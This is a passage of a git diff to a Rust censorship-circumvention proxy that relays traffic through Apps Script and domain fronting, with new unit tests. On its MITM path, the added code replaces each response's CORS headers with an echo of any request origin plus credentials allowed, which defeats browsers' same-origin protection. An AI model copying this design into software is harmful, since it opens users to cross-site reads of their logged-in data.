+            // reset, which was the symptom upstream caught (Apps Script
+            // ate malformed JSON when truncated header blocks were
+            // forwarded blindly).
+            tracing::warn!(
+                "MITM header block exceeds {} bytes — closing ({}:{})",
+                MAX_HEADER_BYTES,
+                host,
+                port
+            );
+            let _ = stream
+                .write_all(
+                    b"HTTP/1.1 431 Request Header Fields Too Large\r\n\
+                      Connection: close\r\n\
+                      Content-Length: 0\r\n\r\n",
+                )
+                .await;
+            let _ = stream.flush().await;
+            return Ok(false);
+        }
     };
 
     let (method, path, _version, headers) = match parse_request_head(&head) {
@@ -1862,7 +2440,7 @@ where
     // pourya-p's log in #64 showed the real Host header. Match every
     // subdomain of x.com here.
     let host_lower = host.to_ascii_lowercase();
-    let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com");
+    let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com") || host_lower == "twitter.com" || host_lower.ends_with(".twitter.com");
     let path = if is_x_com && path.starts_with("/i/api/graphql/") && path.contains("?variables=") {
         match path.split_once('&') {
             Some((short, _)) => {
@@ -1930,6 +2508,32 @@ where
 
     tracing::info!("relay {} {}", method, url);
 
+    // CORS response-header injection. The preflight short-circuit
+    // above handles `OPTIONS`, but the *actual* fetch that follows
+    // also needs CORS-compliant headers on the way back, or the
+    // browser drops the response and the JS layer sees a CORS
+    // failure. Apps Script's `UrlFetchApp.fetch()` preserves the
+    // origin server's response headers inconsistently — sometimes the
+    // destination returns `Access-Control-Allow-Origin: *` (which is
+    // incompatible with `Allow-Credentials: true`), sometimes omits
+    // ACL headers entirely. The visible symptom on YouTube is comments
+    // not loading and the "restricted" gate firing on cross-origin
+    // XHR responses that the browser rejected before the JS handler
+    // could even read them. Idea credit: ThisIsDara/mhr-cfw-go.
+    //
+    // Only injects when the request had an `Origin` header — non-CORS
+    // requests (top-level navigation, plain image fetches) don't need
+    // the headers and adding them would be noise. The relay response
+    // is otherwise byte-identical, so this never affects non-browser
+    // clients (curl, wget, app-level HTTP clients).
+    let cors_origin = header_value(&headers, "origin").map(|s| s.to_string());
+    let transform_head = |head: &[u8]| -> Vec<u8> {
+        match cors_origin.as_deref() {
+            Some(origin) => inject_cors_into_head(head, origin).unwrap_or_else(|| head.to_vec()),
+            None => head.to_vec(),
+        }
+    };
+
     // For GETs without a body, take the range-parallel path — probes
     // with `Range: bytes=0-<chunk>`, and if the origin supports ranges,
     // fetches the rest in parallel 256 KB chunks. This is what lets
@@ -1938,14 +2542,23 @@ where
     // Anything with a body (POST/PUT/PATCH) goes through the normal
     // relay path — range semantics on mutating requests are undefined
     // and would break form submissions.
-    let response = if method.eq_ignore_ascii_case("GET") && body.is_empty() {
+    //
+    // The range-parallel call writes directly to the stream so files
+    // above Apps Script's single-GET ceiling (~40 MiB) can stream
+    // through chunk-by-chunk instead of being buffered into one giant
+    // `Vec<u8>` (which previously failed for 100 MiB+ downloads — #1042).
+    if method.eq_ignore_ascii_case("GET") && body.is_empty() {
         fronter
-            .relay_parallel_range(&method, &url, &headers, &body)
-            .await
+            .relay_parallel_range_to(stream, &method, &url, &headers, &body, transform_head)
+            .await?;
     } else {
-        fronter.relay(&method, &url, &headers, &body).await
-    };
-    stream.write_all(&response).await?;
+        let response = fronter.relay(&method, &url, &headers, &body).await;
+        let response = match cors_origin.as_deref() {
+            Some(origin) => inject_cors_response_headers(&response, origin),
+            None => response,
+        };
+        stream.write_all(&response).await?;
+    }
     stream.flush().await?;
 
     // Keep-alive unless the client asked to close.
@@ -1955,7 +2568,7 @@ where
     Ok(!connection_close)
 }
 
-async fn read_http_head_io<S>(stream: &mut S) -> std::io::Result<Option<(Vec<u8>, Vec<u8>)>>
+async fn read_http_head_io<S>(stream: &mut S) -> std::io::Result<HeadReadResult>
 where
     S: tokio::io::AsyncRead + Unpin,
 {
@@ -1965,7 +2578,7 @@ where
         let n = stream.read(&mut tmp).await?;
         if n == 0 {
             return if buf.is_empty() {
-                Ok(None)
+                Ok(HeadReadResult::Closed)
             } else {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::UnexpectedEof,
@@ -1977,13 +2590,10 @@ where
         if let Some(pos) = find_headers_end(&buf) {
             let head = buf[..pos].to_vec();
             let leftover = buf[pos..].to_vec();
-            return Ok(Some((head, leftover)));
+            return Ok(HeadReadResult::Got { head, leftover });
         }
-        if buf.len() > 1024 * 1024 {
-            return Err(std::io::Error::new(
-                std::io::ErrorKind::InvalidData,
-                "headers too large",
-            ));
+        if buf.len() > MAX_HEADER_BYTES {
+            return Ok(HeadReadResult::Oversized);
         }
     }
 }
@@ -1995,6 +2605,99 @@ fn header_value<'a>(headers: &'a [(String, String)], name: &str) -> Option<&'a s
         .map(|(_, v)| v.as_str())
 }
 
+/// Strip any `Access-Control-*` response headers the origin server
+/// emitted (or that Apps Script's `UrlFetchApp.fetch()` may have
+/// mangled / dropped) and inject a permissive set keyed on the
+/// browser's request `Origin`. Returns a new response buffer; never
+/// mutates in place.
+///
+/// The body is preserved byte-for-byte; only the header block before
+/// the first `\r\n\r\n` is rewritten. If the response can't be parsed
+/// as HTTP/1.x (no header/body separator), it's returned unchanged so
+/// edge-case responses (e.g. raw error blobs from upstream) aren't
+/// corrupted.
+///
+/// Why permissive (`Allow-Methods: *`, `Allow-Headers: *`,
+/// `Expose-Headers: *`): the browser already pre-cleared the request
+/// via the preflight short-circuit (line ~2435), and the relay path
+/// doesn't expose anything that wasn't already going to the
+/// destination through the user's own MITM trust anchor. The wide
+/// permissions only relax browser-side CORS gating; they don't widen
+/// the underlying network reach. `Allow-Credentials: true` is
+/// echo-only-with-explicit-origin (spec requires it; `*` is invalid
+/// alongside credentials) — that's why we echo the request's origin
+/// and never use `*`.
+fn inject_cors_response_headers(response: &[u8], origin: &str) -> Vec<u8> {
+    // Find the header / body separator. If we can't parse the
+    // response as HTTP/1.x, hand it back unchanged.
+    let sep = b"\r\n\r\n";
+    let Some(idx) = response
+        .windows(sep.len())
+        .position(|w| w == sep)
+    else {
+        return response.to_vec();
+    };
+    let head_with_terminator = &response[..idx + sep.len()];
+    let body = &response[idx + sep.len()..];
+
+    let Some(mut buf) = inject_cors_into_head(head_with_terminator, origin) else {
+        return response.to_vec();
+    };
+    buf.extend_from_slice(body);
+    buf
+}
+
+/// Head-only variant of `inject_cors_response_headers`. Takes the head
+/// block of an HTTP/1.x response *including* the trailing `\r\n\r\n`
+/// separator and returns a rewritten head block, again including the
+/// `\r\n\r\n` terminator. Returns `None` if the head block isn't valid
+/// UTF-8 — the caller should pass the original bytes through unchanged
+/// in that case.
+///
+/// Split out so the range-parallel streaming path can apply CORS
+/// rewrites to the response head before the body has been assembled
+/// (where the buffered path could just rewrite the finished
+/// head+body blob).
+pub(crate) fn inject_cors_into_head(head_with_terminator: &[u8], origin: &str) -> Option<Vec<u8>> {
+    let sep = b"\r\n\r\n";
+    let head = head_with_terminator
+        .strip_suffix(sep)
+        .unwrap_or(head_with_terminator);
+    let head_str = std::str::from_utf8(head).ok()?;
+
+    let mut out = String::with_capacity(head.len() + 256);
+    let mut lines = head_str.split("\r\n");
+    if let Some(status) = lines.next() {
+        out.push_str(status);
+        out.push_str("\r\n");
+    }
+    // Rebuild the header block, dropping any pre-existing
+    // `Access-Control-*` lines so the destination's value can't
+    // conflict with ours.
+    for line in lines {
+        let lower = line.to_ascii_lowercase();
+        if lower.starts_with("access-control-") {
+            continue;
+        }
+        out.push_str(line);
+        out.push_str("\r\n");
+    }
+    // Inject our own. `Vary: Origin` tells downstream caches that the
+    // response varies per request origin (so CDN-shared caches don't
+    // serve one user's CORS-tagged response to a different origin).
+    out.push_str("Access-Control-Allow-Origin: ");
+    out.push_str(origin);
+    out.push_str("\r\n");
+    out.push_str("Access-Control-Allow-Credentials: true\r\n");
+    out.push_str("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD\r\n");
+    out.push_str("Access-Control-Allow-Headers: *\r\n");
+    out.push_str("Access-Control-Expose-Headers: *\r\n");
+    out.push_str("Vary: Origin\r\n");
+    out.push_str("\r\n");
+
+    Some(out.into_bytes())
+}
+
 fn expects_100_continue(headers: &[(String, String)]) -> bool {
     header_value(headers, "expect")
         .map(|v| {
@@ -2190,19 +2893,196 @@ async fn do_plain_http(
     // Plain HTTP proxy path — same range-parallel strategy as the
     // MITM-HTTPS path above. Large downloads on port 80 (package
     // mirrors, video poster streams, etc.) need the same acceleration
-    // or the relay stalls per-chunk.
-    let response = if method.eq_ignore_ascii_case("GET") && body.is_empty() {
+    // or the relay stalls per-chunk. No CORS injection on this path —
+    // plain-http proxy traffic isn't a browser-MITM flow, so the
+    // origin's response headers go through unchanged.
+    if method.eq_ignore_ascii_case("GET") && body.is_empty() {
         fronter
-            .relay_parallel_range(&method, &url, &headers, &body)
-            .await
+            .relay_parallel_range_to(
+                &mut sock,
+                &method,
+                &url,
+                &headers,
+                &body,
+                |head: &[u8]| head.to_vec(),
+            )
+            .await?;
     } else {
-        fronter.relay(&method, &url, &headers, &body).await
-    };
-    sock.write_all(&response).await?;
+        let response = fronter.relay(&method, &url, &headers, &body).await;
+        sock.write_all(&response).await?;
+    }
     sock.flush().await?;
     Ok(())
 }
 
+/// `direct` mode plain-HTTP passthrough. The CONNECT path already
+/// falls through to raw TCP for hosts outside the SNI-rewrite set in
+/// `direct`; this is the same idea for the `GET http://…` proxy form
+/// so a bare `http://example.com` typed in the address bar doesn't 502.
+///
+/// We rewrite the absolute-form request URI (`GET http://host/path`) to
+/// origin form (`GET /path`), strip hop-by-hop headers, force
+/// `Connection: close` so a keep-alive client can't pipeline a request
+/// to a different host onto our spliced socket, then dial the origin
+/// (honoring `upstream_socks5` if set) and splice both directions.
+async fn do_plain_http_passthrough(
+    mut sock: TcpStream,
+    head: &[u8],
+    leftover: &[u8],
+    rewrite_ctx: &RewriteCtx,
+) -> std::io::Result<()> {
+    let (method, target, version, headers) = match parse_request_head(head) {
+        Some(v) => v,
+        None => return Ok(()),
+    };
+
+    let (host, port, path) = match resolve_plain_http_target(&target, &headers) {
+        Some(v) => v,
+        None => {
+            tracing::debug!("plain-http passthrough: cannot parse target {}", target);
+            return Ok(());
+        }
+    };
+
+    tracing::info!(
+        "dispatch http {}:{} -> raw-tcp ({}) (direct mode: no relay)",
+        host,
+        port,
+        rewrite_ctx.upstream_socks5.as_deref().unwrap_or("direct"),
+    );
+
+    // Rewrite request line to origin form and drop hop-by-hop headers.
+    let mut rewritten = Vec::with_capacity(head.len());
+    rewritten.extend_from_slice(method.as_bytes());
+    rewritten.push(b' ');
+    rewritten.extend_from_slice(path.as_bytes());
+    rewritten.push(b' ');
+    rewritten.extend_from_slice(version.as_bytes());
+    rewritten.extend_from_slice(b"\r\n");
+    for (k, v) in &headers {
+        let kl = k.to_ascii_lowercase();
+        if kl == "proxy-connection" || kl == "connection" || kl == "keep-alive" {
+            continue;
+        }
+        rewritten.extend_from_slice(k.as_bytes());
+        rewritten.extend_from_slice(b": ");
+        rewritten.extend_from_slice(v.as_bytes());
+        rewritten.extend_from_slice(b"\r\n");
+    }
+    rewritten.extend_from_slice(b"Connection: close\r\n\r\n");
+
+    let target_host = host.trim_start_matches('[').trim_end_matches(']');
+    let connect_timeout = if looks_like_ip(target_host) {
+        std::time::Duration::from_secs(4)
+    } else {
+        std::time::Duration::from_secs(10)
+    };
+    let upstream = if let Some(proxy) = rewrite_ctx.upstream_socks5.as_deref() {
+        match socks5_connect_via(proxy, target_host, port).await {
+            Ok(s) => s,
+            Err(e) => {
+                tracing::warn!(
+                    "upstream-socks5 {} -> {}:{} failed: {} (falling back to direct)",
+                    proxy,
+                    host,
+                    port,
+                    e
+                );
+                match tokio::time::timeout(
+                    connect_timeout,
+                    TcpStream::connect((target_host, port)),
+                )
+                .await
+                {
+                    Ok(Ok(s)) => s,
+                    _ => return Ok(()),
+                }
+            }
+        }
+    } else {
+        match tokio::time::timeout(connect_timeout, TcpStream::connect((target_host, port))).await {
+            Ok(Ok(s)) => s,
+            Ok(Err(e)) => {
+                tracing::debug!("plain-http connect {}:{} failed: {}", host, port, e);
+                return Ok(());
+            }
+            Err(_) => {
+                tracing::debug!("plain-http connect {}:{} timeout", host, port);
+                return Ok(());
+            }
+        }
+    };
+    let _ = upstream.set_nodelay(true);
+
+    let (mut ar, mut aw) = sock.split();
+    let (mut br, mut bw) = upstream.into_split();
+    bw.write_all(&rewritten).await?;
+    if !leftover.is_empty() {
+        bw.write_all(leftover).await?;
+    }
+    let t1 = tokio::io::copy(&mut ar, &mut bw);
+    let t2 = tokio::io::copy(&mut br, &mut aw);
+    tokio::select! {
+        _ = t1 => {}
+        _ = t2 => {}
+    }
+    Ok(())
+}
+
+/// Parse the target of a plain-HTTP proxy request line into
+/// `(host, port, origin-form-path)`. Browsers send absolute form
+/// (`http://host[:port]/path`); we also accept the origin-form
+/// fallback (`/path` with a `Host:` header) for transparent-proxy
+/// clients. `https://` is accepted defensively, though browsers route
+/// HTTPS through CONNECT and shouldn't hit this path.
+fn resolve_plain_http_target(
+    target: &str,
+    headers: &[(String, String)],
+) -> Option<(String, u16, String)> {
+    let (rest, default_port) = if let Some(r) = target.strip_prefix("http://") {
+        (r, 80u16)
+    } else if let Some(r) = target.strip_prefix("https://") {
+        (r, 443u16)
+    } else if target.starts_with('/') {
+        let host_header = headers
+            .iter()
+            .find(|(k, _)| k.eq_ignore_ascii_case("host"))
+            .map(|(_, v)| v.as_str())?;
+        let (host, port) = split_authority(host_header, 80);
+        return Some((host, port, target.to_string()));
+    } else {
+        return None;
+    };
+
+    let (authority, path) = match rest.find('/') {
+        Some(i) => (&rest[..i], &rest[i..]),
+        None => (rest, "/"),
+    };
+    if authority.is_empty() {
+        return None;
+    }
+    let (host, port) = split_authority(authority, default_port);
+    Some((host, port, path.to_string()))
+}
+
+/// Split an `authority` (`host[:port]`, with optional IPv6 brackets)
+/// into a `(host, port)` pair, defaulting the port when absent.
+fn split_authority(authority: &str, default_port: u16) -> (String, u16) {
+    // Bare IPv6 (multiple colons, no brackets) — `rsplit_once(':')`
+    // would otherwise mangle `::1` into `(":", 1)`. Take the whole
+    // string as the host and use the default port.
+    let colons = authority.bytes().filter(|&b| b == b':').count();
+    if colons > 1 && !authority.starts_with('[') {
+        return (authority.to_string(), default_port);
+    }
+    if let Some((h, p)) = authority.rsplit_once(':') {
+        if let Ok(port) = p.parse::<u16>() {
+            return (h.to_string(), port);
+        }
+    }
+    (authority.to_string(), default_port)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -2215,6 +3095,63 @@ mod tests {
             .collect()
     }
 
+    #[test]
+    fn resolve_plain_http_target_parses_absolute_form() {
+        let h = headers(&[]);
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com/", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 80);
+        assert_eq!(path, "/");
+
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com:8080/foo?x=1", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 8080);
+        assert_eq!(path, "/foo?x=1");
+
+        let (host, port, path) =
+            resolve_plain_http_target("http://example.com", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 80);
+        assert_eq!(path, "/");
+    }
+
+    #[test]
+    fn resolve_plain_http_target_falls_back_to_host_header() {
+        let h = headers(&[("Host", "example.com:8080")]);
+        let (host, port, path) = resolve_plain_http_target("/foo", &h).unwrap();
+        assert_eq!(host, "example.com");
+        assert_eq!(port, 8080);
+        assert_eq!(path, "/foo");
+    }
+
+    #[test]
+    fn resolve_plain_http_target_rejects_bare_authority() {
+        // No scheme, doesn't start with `/` — not something we can route.
+        assert!(resolve_plain_http_target("example.com", &headers(&[])).is_none());
+        assert!(resolve_plain_http_target("http://", &headers(&[])).is_none());
+    }
+
+    #[test]
+    fn split_authority_handles_ports_and_ipv6() {
+        assert_eq!(
+            split_authority("example.com", 80),
+            ("example.com".to_string(), 80)
+        );
+        assert_eq!(
+            split_authority("example.com:8080", 80),
+            ("example.com".to_string(), 8080)
+        );
+        assert_eq!(
+            split_authority("[::1]:8080", 80),
+            ("[::1]".to_string(), 8080)
+        );
+        // Bare IPv6 without brackets — keep the whole string as the host
+        // and use the default port instead of mis-splitting on a colon.
+        assert_eq!(split_authority("::1", 80), ("::1".to_string(), 80));
+    }
+
     #[test]
     fn socks5_udp_domain_packet_round_trips() {
         let mut raw = vec![0, 0, 0, 0x03, 11];
@@ -2366,36 +3303,77 @@ mod tests {
 
     #[test]
     fn youtube_via_relay_routes_youtube_through_relay_path() {
-        // Issue #102. When youtube_via_relay=true, YouTube suffixes
-        // must NOT match the SNI-rewrite path, so traffic falls
-        // through to Apps Script relay. Other Google suffixes are
-        // unaffected.
+        // Issue #102 + #275. When youtube_via_relay=true:
+        //   - YouTube API + HTML hosts (where Restricted Mode lives)
+        //     opt out of SNI rewrite so they go through the relay.
+        //   - YouTube image / video / channel-asset CDNs STAY on SNI
+        //     rewrite — Restricted Mode isn't enforced on those, and
+        //     routing video chunks through Apps Script burns quota
+        //     and risks the 6-min execution cap. Pre-#275 ytimg.com
+        //     was incorrectly carved out alongside the API surfaces.
+        //   - Non-YouTube Google suffixes are unaffected by the flag.
         let hosts = std::collections::HashMap::new();
 
-        // Default behaviour: everything in the pool rewrites.
+        // Default behaviour (flag off): everything in the SNI pool
+        // rewrites including all YouTube assets.
+        assert!(should_use_sni_rewrite(&hosts, "www.youtube.com", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false));
+        assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false));
         assert!(should_use_sni_rewrite(
             &hosts,
-            "www.youtube.com",
+            "youtubei.googleapis.com",
             443,
             false
         ));
-        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false));
-        assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false));
-        assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false));
 
-        // With the toggle on: YouTube opts out, Google stays.
+        // googlevideo.com is INTENTIONALLY NOT in SNI_REWRITE_SUFFIXES
+        // — see the long note at the top of the SNI list. v1.7.4 tried
+        // adding it; reverted in v1.7.6 after user reports of total
+        // YouTube breakage. If the project ever ships an EVA-edge-IP
+        // config knob, this assertion can flip. Until then, video
+        // chunks correctly fall through to the Apps Script relay path
+        // and this assertion guards against a regression.
         assert!(!should_use_sni_rewrite(
             &hosts,
-            "www.youtube.com",
+            "rr1---sn-abc.googlevideo.com",
             443,
-            true
+            false
         ));
-        assert!(!should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true));
+
+        // Flag on: only the API + HTML hosts opt out.
+        assert!(!should_use_sni_rewrite(&hosts, "www.youtube.com", 443, true));
         assert!(!should_use_sni_rewrite(&hosts, "youtu.be", 443, true));
+        assert!(!should_use_sni_rewrite(
+            &hosts,
+            "www.youtube-nocookie.com",
+            443,
+            true
+        ));
+        assert!(!should_use_sni_rewrite(
+            &hosts,
+            "youtubei.googleapis.com",
+            443,
+            true
+        ));
+
+        // Flag on: image / channel-asset CDNs STAY on SNI rewrite. Pre-#275
+        // ytimg.com was incorrectly carved out alongside the API surfaces.
+        // googlevideo.com still goes through the relay path (not in the
+        // SNI list at all — see note above the SNI_REWRITE_SUFFIXES
+        // entries) so the same flag-on assertion isn't applicable to it.
+        assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true));
+        assert!(should_use_sni_rewrite(&hosts, "yt3.ggpht.com", 443, true));
+
+        // Flag on: non-YouTube Google suffixes are unaffected. Note
+        // youtubei.googleapis.com (above) is the *carve-out* — the
+        // broader googleapis.com suffix is NOT carved out, so e.g.
+        // Drive / Calendar / etc. continue to SNI-rewrite.
         assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, true));
+        assert!(should_use_sni_rewrite(&hosts, "fonts.gstatic.com", 443, true));
         assert!(should_use_sni_rewrite(
             &hosts,
-            "fonts.gstatic.com",
+            "drive.googleapis.com",
             443,
             true
         ));
@@ -2444,6 +3422,69 @@ mod tests {
         assert!(!matches_passthrough("", &list));
     }
 
+    #[test]
+    fn inject_cors_response_headers_replaces_existing_acl_with_origin_echo() {
+        // Origin server returned `Access-Control-Allow-Origin: *` which
+        // browsers reject when paired with `Allow-Credentials: true` (the
+        // YouTube comments failure mode). Our injection must strip the
+        // wildcard and substitute the request's actual origin so that
+        // credentialed requests succeed.
+        let response = b"HTTP/1.1 200 OK\r\n\
+                        Content-Type: application/json\r\n\
+                        Access-Control-Allow-Origin: *\r\n\
+                        Access-Control-Allow-Methods: GET\r\n\
+                        Content-Length: 12\r\n\
+                        \r\n\
+                        {\"a\":\"b\"}xx";
+        let injected = inject_cors_response_headers(response, "https://www.youtube.com");
+        let s = std::str::from_utf8(&injected).unwrap();
+        // Original wildcard must be gone.
+        assert!(
+            !s.contains("Access-Control-Allow-Origin: *"),
+            "wildcard origin must be stripped, got: {}",
+            s
+        );
+        // Echoed origin + credentials must be present.
+        assert!(s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+        assert!(s.contains("Access-Control-Allow-Credentials: true\r\n"));
+        // Body preserved byte-for-byte.
+        assert!(injected.ends_with(b"{\"a\":\"b\"}xx"));
+        // Status line preserved.
+        assert!(s.starts_with("HTTP/1.1 200 OK\r\n"));
+    }
+
+    #[test]
+    fn inject_cors_response_headers_preserves_non_acl_headers() {
+        // Non-ACL headers (Content-Type, Set-Cookie, Cache-Control, …)
+        // must pass through unchanged. Only `Access-Control-*` lines
+        // are stripped.
+        let response = b"HTTP/1.1 200 OK\r\n\
+                        Content-Type: text/html\r\n\
+                        Set-Cookie: a=1\r\n\
+                        Cache-Control: max-age=300\r\n\
+                        Access-Control-Allow-Origin: https://other.example\r\n\
+                        \r\n\
+                        body";
+        let injected = inject_cors_response_headers(response, "https://www.youtube.com");
+        let s = std::str::from_utf8(&injected).unwrap();
+        assert!(s.contains("Content-Type: text/html\r\n"));
+        assert!(s.contains("Set-Cookie: a=1\r\n"));
+        assert!(s.contains("Cache-Control: max-age=300\r\n"));
+        // Wrong origin replaced.
+        assert!(!s.contains("Access-Control-Allow-Origin: https://other.example\r\n"));
+        assert!(s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+    }
+
+    #[test]
+    fn inject_cors_response_headers_returns_unchanged_when_no_header_terminator() {
+        // A response missing the `\r\n\r\n` separator (e.g. raw error
+        // blob, truncated upstream) must round-trip unchanged so we
+        // don't corrupt non-HTTP/1.x bytes.
+        let response = b"not an http response";
+        let injected = inject_cors_response_headers(response, "https://x.com");
+        assert_eq!(injected.as_slice(), response);
+    }
+
     #[test]
     fn passthrough_hosts_ignores_empty_and_whitespace_entries() {
         let list = vec!["".to_string(), "   ".to_string(), "real.com".to_string()];
@@ -2459,4 +3500,152 @@ mod tests {
         assert!(matches_passthrough("example.com", &list));
         assert!(matches_passthrough("example.com.", &list));
     }
+
+    #[test]
+    fn doh_default_list_exact_matches() {
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("chrome.cloudflare-dns.com", &extra));
+        assert!(matches_doh_host("dns.google", &extra));
+        assert!(matches_doh_host("dns.quad9.net", &extra));
+        assert!(matches_doh_host("doh.opendns.com", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_case_insensitive_and_trailing_dot() {
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("DNS.GOOGLE", &extra));
+        assert!(matches_doh_host("dns.google.", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_suffix_match_for_tenant_subdomains() {
+        // `cloudflare-dns.com` is in the default list — Workers-hosted
+        // tenant DoH endpoints sit under it and should match too.
+        let extra: Vec<String> = vec![];
+        assert!(matches_doh_host("tenant.cloudflare-dns.com", &extra));
+        // But a substring match must NOT pass: `xcloudflare-dns.com` is
+        // a different domain.
+        assert!(!matches_doh_host("xcloudflare-dns.com", &extra));
+    }
+
+    #[test]
+    fn doh_default_list_unrelated_hosts_do_not_match() {
+        let extra: Vec<String> = vec![];
+        assert!(!matches_doh_host("example.com", &extra));
+        assert!(!matches_doh_host("googlevideo.com", &extra));
+        assert!(!matches_doh_host("", &extra));
+    }
+
+    #[test]
+    fn doh_extra_list_extends_default() {
+        let extra = vec![".internal-doh.example".to_string(), "doh.acme.test".to_string()];
+        // Defaults still match.
+        assert!(matches_doh_host("dns.google", &extra));
+        // User additions match.
+        assert!(matches_doh_host("doh.acme.test", &extra));
+        assert!(matches_doh_host("a.b.internal-doh.example", &extra));
+        // Unrelated still doesn't match.
+        assert!(!matches_doh_host("example.com", &extra));
+    }
+
+    #[test]
+    fn doh_extra_entries_match_subdomains_without_leading_dot() {
+        // Asymmetry footgun guard: user adds `doh.acme.test` and expects
+        // `tenant.doh.acme.test` to match too — same as `dns.google`
+        // matching `tenant.dns.google` from the default list. Unlike
+        // `passthrough_hosts`, DoH extras don't require a leading dot.
+        let extra = vec!["doh.acme.test".to_string()];
+        assert!(matches_doh_host("doh.acme.test", &extra));
+        assert!(matches_doh_host("tenant.doh.acme.test", &extra));
+        // But substring overlap must still be rejected.
+        assert!(!matches_doh_host("xdoh.acme.test", &extra));
+    }
+
+    fn fg(name: &str, sni: &str, domains: &[&str]) -> Arc<FrontingGroupResolved> {
+        Arc::new(
+            FrontingGroupResolved::from_config(&FrontingGroup {
+                name: name.into(),
+                ip: "127.0.0.1".into(),
+                sni: sni.into(),
+                domains: domains.iter().map(|s| s.to_string()).collect(),
+            })
+            .expect("test fronting group should resolve"),
+        )
+    }
+
+    #[test]
+    fn fronting_group_match_exact_and_suffix() {
+        let groups = vec![fg("vercel", "react.dev", &["vercel.com", "nextjs.org"])];
+        // Exact.
+        assert_eq!(
+            match_fronting_group("vercel.com", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Suffix.
+        assert_eq!(
+            match_fronting_group("app.vercel.com", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Different member.
+        assert_eq!(
+            match_fronting_group("docs.nextjs.org", &groups).map(|g| g.name.as_str()),
+            Some("vercel")
+        );
+        // Non-member.
+        assert!(match_fronting_group("example.com", &groups).is_none());
+        // Substring overlap is NOT a match (xvercel.com isn't *.vercel.com).
+        assert!(match_fronting_group("xvercel.com", &groups).is_none());
+    }
+
+    #[test]
+    fn fronting_group_match_case_and_trailing_dot() {
+        let groups = vec![fg("fastly", "www.python.org", &["reddit.com"])];
+        assert_eq!(
+            match_fronting_group("Reddit.COM", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+        assert_eq!(
+            match_fronting_group("reddit.com.", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+        assert_eq!(
+            match_fronting_group("WWW.Reddit.com.", &groups).map(|g| g.name.as_str()),
+            Some("fastly")
+        );
+    }
+
+    #[test]
+    fn fronting_group_match_first_wins() {
+        // When a host is in two groups, the earlier group is chosen.
+        // Lets users put more-specific groups first.
+        let groups = vec![
+            fg("specific", "a.example", &["api.example.com"]),
+            fg("broad", "b.example", &["example.com"]),
+        ];
+        assert_eq!(
+            match_fronting_group("api.example.com", &groups).map(|g| g.name.as_str()),
+            Some("specific")
+        );
+        assert_eq!(
+            match_fronting_group("example.com", &groups).map(|g| g.name.as_str()),
+            Some("broad")
+        );
+    }
+
+    #[test]
+    fn fronting_group_match_empty_list() {
+        let groups: Vec<Arc<FrontingGroupResolved>> = Vec::new();
+        assert!(match_fronting_group("vercel.com", &groups).is_none());
+    }
+
+    #[test]
+    fn fronting_group_resolve_rejects_invalid_sni() {
+        let bad = FrontingGroup {
+            name: "bad".into(),
+            ip: "127.0.0.1".into(),
+            sni: "not a valid hostname".into(),
+            domains: vec!["x.com".into()],
+        };
+        assert!(FrontingGroupResolved::from_config(&bad).is_err());
+    }
 }
diff --git a/src/test_cmd.rs b/src/test_cmd.rs
index a9007a8d..b87c7fdd 100644
--- a/src/test_cmd.rs
+++ b/src/test_cmd.rs
@@ -20,10 +20,10 @@ use crate::domain_fronter::DomainFronter;
 const TEST_URL: &str = "https://api.ipify.org/?format=json";
 
 pub async fn run(config: &Config) -> bool {
-    if matches!(config.mode_kind(), Ok(Mode::GoogleOnly)) {
+    if matches!(config.mode_kind(), Ok(Mode::Direct)) {
         let msg = "`mhrv-rs test` probes the Apps Script relay, which isn't \
-                   wired up in google_only mode. Run `mhrv-rs test-sni` to \
-                   check the direct SNI-rewrite tunnel instead.";
+                   wired up in direct mode. Run `mhrv-rs test-sni` to check \
+                   the SNI-rewrite tunnel instead.";
         println!("{}", msg);
         tracing::error!("{}", msg);
         return false;
@@ -35,7 +35,7 @@ pub async fn run(config: &Config) -> bool {
         // back as the Apps Script datacenter — confusing because it
         // disagreed with what whatismyipaddress.com showed in the
         // browser (which DOES go through the tunnel). Rather than fake
-        // a passing test, refuse the same way we do for google_only and
+        // a passing test, refuse the same way we do for direct mode and
         // tell the user how to actually verify Full mode.
         let msg = "`mhrv-rs test` is wired only for the apps_script relay \
                    path. In full mode the data plane is the pipelined \
diff --git a/src/tunnel_client.rs b/src/tunnel_client.rs
index 72444e60..887561a3 100644
--- a/src/tunnel_client.rs
+++ b/src/tunnel_client.rs
@@ -5,7 +5,7 @@
 //! Each Apps Script deployment (account) gets its own concurrency pool of
 //! 30 in-flight requests — matching the per-account Apps Script limit.
 
-use std::collections::HashMap;
+use std::collections::{BTreeMap, HashMap};
 // `AtomicU64` from `std::sync::atomic` requires hardware-backed 64-bit
 // atomics, which 32-bit MIPS (`mipsel-unknown-linux-musl` — our OpenWRT
 // router target) does not provide — the std type isn't even defined
@@ -14,16 +14,18 @@ use std::collections::HashMap;
